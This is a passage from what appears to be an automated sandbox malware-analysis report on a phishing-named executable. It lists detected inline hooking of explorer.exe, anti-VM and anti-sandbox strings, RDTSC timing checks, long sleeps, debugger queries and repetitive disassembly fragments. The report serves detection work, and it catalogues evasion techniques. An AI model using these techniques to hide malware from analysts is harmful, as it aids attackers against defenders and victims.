          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A667E push edx; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030ACEB5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_030A9DB2 push es; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0309E42C push ss; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03094443 push 0000007Bh; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.45974448722
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeFile created: \payment transfer copy of $274,876.00 for the invoice shipments.exe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEA
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe PID: 6512, type: MEMORY
          Source: Yara matchFile source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.2a94cf8.1.raw.unpack, type: UNPACKEDPE
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000030998E4 second address: 00000000030998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000003099B5E second address: 0000000003099B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe TID: 6516Thread sleep time: -99992s >= -30000s
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe TID: 6532Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5480Thread sleep count: 84 > 30
          Source: C:\Windows\explorer.exe TID: 5480Thread sleep time: -168000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3868Thread sleep count: 36 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 3868Thread sleep time: -180000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.259257447.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000005.00000000.251785996.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.259520617.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000005.00000002.755874779.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01004120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01067016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01000050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01000050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01063884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01063884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01013B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01013B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0109D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0101B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01012397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01014BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_0100DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_00FF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCode function: 4_2_01003A1C mov eax, dword ptr fs:[00000030h]
